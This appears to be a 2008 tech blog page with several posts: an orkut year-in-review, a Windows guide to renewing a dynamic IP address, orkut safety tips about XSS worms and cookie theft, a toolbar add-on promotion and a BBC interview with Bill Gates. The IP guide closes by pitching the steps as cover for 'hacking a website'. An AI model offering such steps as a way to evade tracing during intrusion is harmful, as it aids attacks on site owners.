As we started the new year, we took some time to look back on the year for orkut. Sometimes we get so caught up looking forward to all the new features we want to launch, we forget to look back at what we have accomplished. If you've been on orkut since January, you may remember when you first saw these features. Or if you've joined more recently you may never have known the site without these favorites. So here are the highlights for this year by month - turns out orkut has come a long way!
In January, we launched our first mobile feature on orkut with orkut SMS integration with Claro, the Brazilian mobile carrier. Since then we have partnered with other mobile providers, and you can now send and receive scraps and find your friends' contact information if you have phone service with Amazônia Celular, Brasil Telecom, Claro, or Telemig Celular. If you still haven't signed up it's not too late to receive those new years scraps on your cell phone: just go to settings and click on the mobile tab.
February brought videos to orkut when we launched integration with Google Video and YouTube. People began copying and pasting URLs of their favorite videos onto the favorite videos page of their profiles. This has been one of the most popular feature launches ever. Since February you have added over 300 million videos to your profiles!
Orkut Buyukkokten, the creator of orkut.com, visited Brazil for the first time in March and spent three weeks touring the country, giving tech talks to hundreds of University Students, conducting focus groups and interviewing with the press. If you missed the visit you can check out the community and the photo album.
Community Polls were enabled in April. Since then people have been voting on topics from the best restaurants in their cities to the most important politician of their towns.
May brought feed integration, allowing you to bring in content from your favorite blogs, Picasa Web Albums or any other source that supports feeds. Still haven't added a feed? Why not add this blog so you always know the latest. Go to add stuff in the left navigation and add the URL.
You wouldn't be reading this if we hadn't launched this blog in June! In case you are bilingual, check out the blog in Portuguese as well.
We were honored to receive the award for "Best Social Networking Site!" from India PC World in July.
The biggest milestone for orkut, perhaps since the launch of the site, happened in August when we launched the visual redesign. This included a slight change to the colors, rounded corners, new icons and an easier-to-use navigation. While giving the site a facelift we also maintained the familiarity and simplicity you've enjoyed for years. Can you even remember the old orkut?
We revamped the site again in September to show updates from your friends right on your homepage. To show or hide your own updates go to the settings page.
In October, we went from allowing you to upload only 12 photos to your album to allowing 100 photos in your album. If you still haven't filled up your album, why not add your latest holiday photos?
This November, Google made the announcement that orkut would be opening up to developers through OpenSocial. If you're a software developer you can test out the platform by joining our Sandbox. We look forward to seeing what applications you're developing for orkut when we launch the platform to consumers next year.
As the year winded down in December, we launched new privacy features that allow you more control over who sees your photos, videos, testimonials and scraps.
Happy New Year orkuters-- we look forward to a great 2008!
Tuesday, January 8, 2008
How To: Change Your Ip In Less Then 1 Minute
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
After The Latest Rodrigo's Worm , Its Obvious Any One will Be Worried About Their Safety On Orkut
Surprisingly True! A Virus, Keylogger,even Flash Files (Greetings,Music,Games,etc) the latest bad man tool on orkut. Most of the time, it is encoded with A HTML Or Java Code . If you click on the Links Given it redirects you to a site which tries to install something on your computer.
Here are some routine tips you must follow to ensure safe orkutting experience:
* Stay away from suspicious scraps.
* You must have a good anti virus installed
* Avoid clicking on links scrapped to you by unknown members.
* Avoid navigating to the links scrapped from your friends - There may be a great possiblity that your friend is actually not your friend and someone else.
Yes. This is true. You can get hacked even if you try to read your scraps. There is always a Genius Mind Working to Create a XSS in the scrapbook, which allows the execution of malicious script, which can preform following actions:
* Stealing your cookies
* Logging you out and redirecting you to a fake page (screenshot)
* Logging you out and redirecting you to a page which automatically installs keylogger, viruses in your computer system.
Is there a Remedy or a Precaution?
Ofcourse, precautions are always there. I am not too sure about the remedies though. Here are a few things you need if you want to stay safe on orkut
* Get Firefox - Latest Version (188.8.131.52)
Why->The latest series of firefox encrypts your cookies so that the information in the cookie cannot be read.
* FlashBlock Firefox Addon - THE BIG ONE (Must Have)!
Why->This add on will ensure that no flash file will execute without your prior consent. this is a must install in this case.This is the actual precaution in this issue. Link-[addons.mozilla.org/firefox/addon/43
Since Most PPL Face Problems In Signature Scripts,Formatting Scripts Etc...Though Old Its A Must Have For U....
Orkut Toolbar 1.4
Orkut Toolbar helps you to format the text of your posts in the Orkut forums, easily access all common functions of orkut, create and manage custom signatures and insert and view images and flash movies in orkut posts and scraps.
Orkut Toolbar helps you to format the text of your posts in the Orkut forums, easily access all common functions of orkut, create and manage custom signatures and insert and view images and flash movies in orkut posts, scraps and profiles.
With Orkut Toolbar all you need is type your entire text without any formatting code and then select the desired parts of text and apply the format using the toolbar buttons. Much like you do in OpenOffice, MS Word or any other text editor.
* Firefox Firefox: 1.0 – 2.0.0.*
Install Now -[addons.mozilla.org/en-US/firefox/downlo
Monday, January 7, 2008
Touch will become an important interface for PCs, Mr Gates said
The way people interact with computers is going to dramatically change in the next five years, Microsoft chief Bill Gates has told BBC News.
He predicted that the keyboard and mouse would gradually give way to more intuitive and natural technologies.
In particular, he said, touch, vision and speech interfaces would become increasingly important.
Mr Gates made his comments whilst answering questions from BBC News website readers.
"This whole idea of what I call natural user interface is really redefining the experience," he said.
"We're adding the ability to touch and directly manipulate, we're adding vision so the computer can see what you're doing, we're adding the pen, we're adding speech," he told BBC News.
During the interview Mr Gates showed off the Microsoft Surface computer, a large table like machine with a multi-touch interface.
"I'll be brave, in five years we'll have many tens of million of people sitting browsing their photos, browsing their music, organising their lives using this type of touch interface," he said.
Although Microsoft Windows has become the most widely used operating system in the world, Mr Gates admitted that he had not always got things right.
"People thought we were late with the [web] browser," he admitted.
In addition, he said, search was an area where people thought that Microsoft had not fulfilled expectations.
"Google has done a good job," he said. "We expect to surprise people that we can match and even do better there - people should wait and see."
Mr Gates also answered questions about Windows Vista, the firm's often-criticised operating system, launched last year.
He said the firm had received "lots of feedback" on the software.
"We do downloads and improvements all of the time and of course there'll be a major new version coming along," he said.
Microsoft has just announced that it has sold 100 million licences for the operating system.
During the questions and answer session he also revealed his own computer habits.
"There are a lot of PCs in my house - over 10," he said.
In particular, he said, he used a tablet PC, a notebook computer that is operated with a digital stylus.
However, he said, he does not use his competitor's products.